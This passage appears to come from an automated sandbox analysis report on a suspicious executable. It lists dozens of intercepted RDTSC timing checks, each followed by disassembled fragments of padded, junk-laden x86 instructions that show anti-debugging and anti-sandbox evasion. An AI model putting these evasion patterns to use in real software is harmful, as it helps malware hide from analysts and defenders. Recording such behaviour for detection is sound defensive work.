                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: 5710389 second address: 571038F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: 571038F second address: 5710393 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: 5710393 second address: 57103E6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 and dword ptr [eax+04h], 00000000h 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007FF34080AB18h 0x00000015 xor si, D4E8h 0x0000001a jmp 00007FF34080AB0Bh 0x0000001f popfd 0x00000020 call 00007FF34080AB18h 0x00000025 pop esi 0x00000026 popad 0x00000027 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: 56F05D9 second address: 56F05E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF3408102FCh 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: 5700DE3 second address: 5700DE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: 5700DE8 second address: 5700DF8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF3408102FCh 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: 5700DF8 second address: 5700DFC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: 5700DFC second address: 5700E0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: 5700E0B second address: 5700E24 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF34080AB15h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: 5700E24 second address: 5700E2A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: 57100D9 second address: 57100DF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: 57100DF second address: 5710104 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx eax, di 0x00000006 jmp 00007FF3408102FDh 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FF3408102FCh 0x00000016 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: 5710104 second address: 571010A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: 571010A second address: 5710129 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FF340810304h 0x00000010 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: 57307AD second address: 57307B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: 57307B1 second address: 57307B7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: 57307B7 second address: 57307DC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, 880Fh 0x00000007 jmp 00007FF34080AB14h 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 movsx ebx, ax 0x00000016 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: 57307DC second address: 5730812 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF340810308h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a call 00007FF340810300h 0x0000000f pop ecx 0x00000010 popad 0x00000011 popad 0x00000012 xchg eax, ebp 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: 5730812 second address: 573083D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007FF34080AB14h 0x0000000a add ax, 71A8h 0x0000000f jmp 00007FF34080AB0Bh 0x00000014 popfd 0x00000015 popad 0x00000016 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: 573083D second address: 5730843 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: 5730843 second address: 5730853 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: 5730853 second address: 5730859 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: 5730859 second address: 573085F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: 573085F second address: 5730863 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: 5730863 second address: 5730875 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov dh, D4h 0x0000000e mov bx, si 0x00000011 popad 0x00000012 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: 5730875 second address: 57308C1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF340810309h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ecx 0x0000000c jmp 00007FF3408102FEh 0x00000011 mov eax, dword ptr [76FB65FCh] 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007FF340810307h 0x0000001d rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: 57308C1 second address: 57308C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: 57308C7 second address: 57308CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: 57308CB second address: 5730928 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test eax, eax 0x0000000a jmp 00007FF34080AB17h 0x0000000f je 00007FF3B200DB80h 0x00000015 pushad 0x00000016 mov cl, 55h 0x00000018 call 00007FF34080AB11h 0x0000001d jmp 00007FF34080AB10h 0x00000022 pop eax 0x00000023 popad 0x00000024 mov ecx, eax 0x00000026 push eax 0x00000027 push edx 0x00000028 jmp 00007FF34080AB0Ch 0x0000002d rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: 5730928 second address: 573092E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: 573092E second address: 5730932 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: 5730932 second address: 5730936 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: 5730936 second address: 5730968 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xor eax, dword ptr [ebp+08h] 0x0000000b jmp 00007FF34080AB16h 0x00000010 and ecx, 1Fh 0x00000013 pushad 0x00000014 movzx ecx, dx 0x00000017 mov bh, 3Ch 0x00000019 popad 0x0000001a ror eax, cl 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: 5730968 second address: 5730992 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007FF3408102FDh 0x0000000a and si, 5E16h 0x0000000f jmp 00007FF340810301h 0x00000014 popfd 0x00000015 popad 0x00000016 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: 5730992 second address: 57309A2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF34080AB0Ch 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: 57309A2 second address: 57309C8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF3408102FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b leave 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FF340810300h 0x00000015 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: 57309C8 second address: 57309CE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: 57309CE second address: 5730A22 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF3408102FEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 retn 0004h 0x0000000c nop 0x0000000d mov esi, eax 0x0000000f lea eax, dword ptr [ebp-08h] 0x00000012 xor esi, dword ptr [00D92014h] 0x00000018 push eax 0x00000019 push eax 0x0000001a push eax 0x0000001b lea eax, dword ptr [ebp-10h] 0x0000001e push eax 0x0000001f call 00007FF3451F0CE9h 0x00000024 push FFFFFFFEh 0x00000026 jmp 00007FF340810300h 0x0000002b pop eax 0x0000002c jmp 00007FF340810300h 0x00000031 ret 0x00000032 nop 0x00000033 push eax 0x00000034 call 00007FF3451F0D06h 0x00000039 mov edi, edi 0x0000003b push eax 0x0000003c push edx 0x0000003d jmp 00007FF340810307h 0x00000042 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: 5730A22 second address: 5730A28 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: 5730A28 second address: 5730A46 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 jmp 00007FF3408102FCh 0x0000000e mov dword ptr [esp], ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: 5730A46 second address: 5730A4C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: 5730A4C second address: 5730A53 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bl, ch 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: 5730A53 second address: 5730A87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov ebp, esp 0x00000009 jmp 00007FF34080AB13h 0x0000000e pop ebp 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FF34080AB15h 0x00000016 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: 56E0028 second address: 56E0031 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: 56E0031 second address: 56E0035 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: 56E0035 second address: 56E0072 instructions: 0x00000000 rdtsc 0x00000002 call 00007FF3408102FFh 0x00000007 pop esi 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007FF340810300h 0x00000015 sub si, 1DF8h 0x0000001a jmp 00007FF3408102FBh 0x0000001f popfd 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: 56E0072 second address: 56E0077 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: 56E0077 second address: 56E0092 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF3408102FFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: 56E0092 second address: 56E0096 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: 56E0096 second address: 56E009C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: 56E01B4 second address: 56E01B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: 56E01B9 second address: 56E026C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FF3408102FDh 0x00000009 add esi, 75E02D96h 0x0000000f jmp 00007FF340810301h 0x00000014 popfd 0x00000015 mov dh, ch 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a push eax 0x0000001b pushad 0x0000001c mov dl, cl 0x0000001e mov dx, 2EF6h 0x00000022 popad 0x00000023 mov dword ptr [esp], esi 0x00000026 pushad 0x00000027 movsx edi, cx 0x0000002a pushad 0x0000002b pushfd 0x0000002c jmp 00007FF340810302h 0x00000031 adc si, 5018h 0x00000036 jmp 00007FF3408102FBh 0x0000003b popfd 0x0000003c mov ebx, esi 0x0000003e popad 0x0000003f popad 0x00000040 mov esi, dword ptr [ebp+08h] 0x00000043 pushad 0x00000044 mov edi, eax 0x00000046 pushad 0x00000047 push eax 0x00000048 pop edi 0x00000049 pushfd 0x0000004a jmp 00007FF340810306h 0x0000004f sbb esi, 3D9DB1A8h 0x00000055 jmp 00007FF3408102FBh 0x0000005a popfd 0x0000005b popad 0x0000005c popad 0x0000005d xchg eax, edi 0x0000005e push eax 0x0000005f push edx 0x00000060 jmp 00007FF340810305h 0x00000065 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: 56E026C second address: 56E033B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov di, E052h 0x00000007 push ebx 0x00000008 pop ecx 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jmp 00007FF34080AB14h 0x00000012 xchg eax, edi 0x00000013 jmp 00007FF34080AB10h 0x00000018 test esi, esi 0x0000001a jmp 00007FF34080AB10h 0x0000001f je 00007FF3B2058E6Bh 0x00000025 pushad 0x00000026 mov cl, BEh 0x00000028 pushfd 0x00000029 jmp 00007FF34080AB13h 0x0000002e and eax, 7C8AE70Eh 0x00000034 jmp 00007FF34080AB19h 0x00000039 popfd 0x0000003a popad 0x0000003b cmp dword ptr [esi+08h], DDEEDDEEh 0x00000042 pushad 0x00000043 mov al, 82h 0x00000045 pushad 0x00000046 push edx 0x00000047 pop ecx 0x00000048 movsx edi, cx 0x0000004b popad 0x0000004c popad 0x0000004d je 00007FF3B2058E31h 0x00000053 push eax 0x00000054 push edx 0x00000055 pushad 0x00000056 pushfd 0x00000057 jmp 00007FF34080AB0Fh 0x0000005c xor si, 51CEh 0x00000061 jmp 00007FF34080AB19h 0x00000066 popfd 0x00000067 pushad 0x00000068 popad 0x00000069 popad 0x0000006a rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: 56E033B second address: 56E0341 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: 56E0341 second address: 56E03D0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov edx, dword ptr [esi+44h] 0x0000000b pushad 0x0000000c mov ax, bx 0x0000000f pushfd 0x00000010 jmp 00007FF34080AB17h 0x00000015 add ch, FFFFFF8Eh 0x00000018 jmp 00007FF34080AB19h 0x0000001d popfd 0x0000001e popad 0x0000001f or edx, dword ptr [ebp+0Ch] 0x00000022 jmp 00007FF34080AB0Eh 0x00000027 test edx, 61000000h 0x0000002d jmp 00007FF34080AB10h 0x00000032 jne 00007FF3B2058DE1h 0x00000038 pushad 0x00000039 mov bx, cx 0x0000003c mov ah, 02h 0x0000003e popad 0x0000003f test byte ptr [esi+48h], 00000001h 0x00000043 push eax 0x00000044 push edx 0x00000045 jmp 00007FF34080AB10h 0x0000004a rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: 56E03D0 second address: 56E03FC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF3408102FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jne 00007FF3B205E5B8h 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FF340810305h 0x00000016 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: 56E03FC second address: 56E0402 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: 56E0402 second address: 56E0435 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF340810303h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b test bl, 00000007h 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FF340810305h 0x00000015 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: 56D0746 second address: 56D074C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: 56D074C second address: 56D0750 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: 56D0750 second address: 56D076D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FF34080AB12h 0x00000010 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: 56D076D second address: 56D0773 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: 56D0773 second address: 56D079F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF34080AB0Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d jmp 00007FF34080AB0Eh 0x00000012 and esp, FFFFFFF8h 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: 56D079F second address: 56D07A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: 56D07A3 second address: 56D07C0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF34080AB19h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: 56D07C0 second address: 56D08A6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov di, 7772h 0x00000007 pushfd 0x00000008 jmp 00007FF340810303h 0x0000000d adc esi, 5EA0AD6Eh 0x00000013 jmp 00007FF340810309h 0x00000018 popfd 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c xchg eax, ebx 0x0000001d jmp 00007FF3408102FEh 0x00000022 push eax 0x00000023 pushad 0x00000024 mov edx, 2A46D394h 0x00000029 mov eax, ebx 0x0000002b popad 0x0000002c xchg eax, ebx 0x0000002d jmp 00007FF3408102FFh 0x00000032 xchg eax, esi 0x00000033 jmp 00007FF340810306h 0x00000038 push eax 0x00000039 pushad 0x0000003a mov ax, bx 0x0000003d pushfd 0x0000003e jmp 00007FF3408102FDh 0x00000043 or ax, D866h 0x00000048 jmp 00007FF340810301h 0x0000004d popfd 0x0000004e popad 0x0000004f xchg eax, esi 0x00000050 jmp 00007FF3408102FEh 0x00000055 mov esi, dword ptr [ebp+08h] 0x00000058 jmp 00007FF340810300h 0x0000005d sub ebx, ebx 0x0000005f jmp 00007FF340810301h 0x00000064 test esi, esi 0x00000066 push eax 0x00000067 push edx 0x00000068 push eax 0x00000069 push edx 0x0000006a push eax 0x0000006b push edx 0x0000006c rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: 56D08A6 second address: 56D08AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: 56D08AA second address: 56D08AE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: 56D08AE second address: 56D08B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: 56D08B4 second address: 56D08BA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: 56D08BA second address: 56D08BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: 56D08BE second address: 56D091D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF3408102FCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b je 00007FF3B2065DB4h 0x00000011 jmp 00007FF340810300h 0x00000016 cmp dword ptr [esi+08h], DDEEDDEEh 0x0000001d jmp 00007FF340810300h 0x00000022 mov ecx, esi 0x00000024 jmp 00007FF340810300h 0x00000029 je 00007FF3B2065D8Ah 0x0000002f pushad 0x00000030 mov di, cx 0x00000033 push eax 0x00000034 push edx 0x00000035 pushad 0x00000036 popad 0x00000037 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: 56D091D second address: 56D09AA instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FF34080AB16h 0x00000008 xor cx, 5CB8h 0x0000000d jmp 00007FF34080AB0Bh 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 popad 0x00000016 test byte ptr [76FB6968h], 00000002h 0x0000001d jmp 00007FF34080AB16h 0x00000022 jne 00007FF3B2060555h 0x00000028 jmp 00007FF34080AB10h 0x0000002d mov edx, dword ptr [ebp+0Ch] 0x00000030 jmp 00007FF34080AB10h 0x00000035 xchg eax, ebx 0x00000036 push eax 0x00000037 push edx 0x00000038 jmp 00007FF34080AB17h 0x0000003d rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: 56D09AA second address: 56D09FA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, 6DEDEB4Ah 0x00000008 mov edi, 7AA77216h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 jmp 00007FF3408102FCh 0x00000016 xchg eax, ebx 0x00000017 jmp 00007FF340810300h 0x0000001c xchg eax, ebx 0x0000001d jmp 00007FF340810300h 0x00000022 push eax 0x00000023 jmp 00007FF3408102FBh 0x00000028 xchg eax, ebx 0x00000029 push eax 0x0000002a push edx 0x0000002b pushad 0x0000002c popad 0x0000002d rdtsc
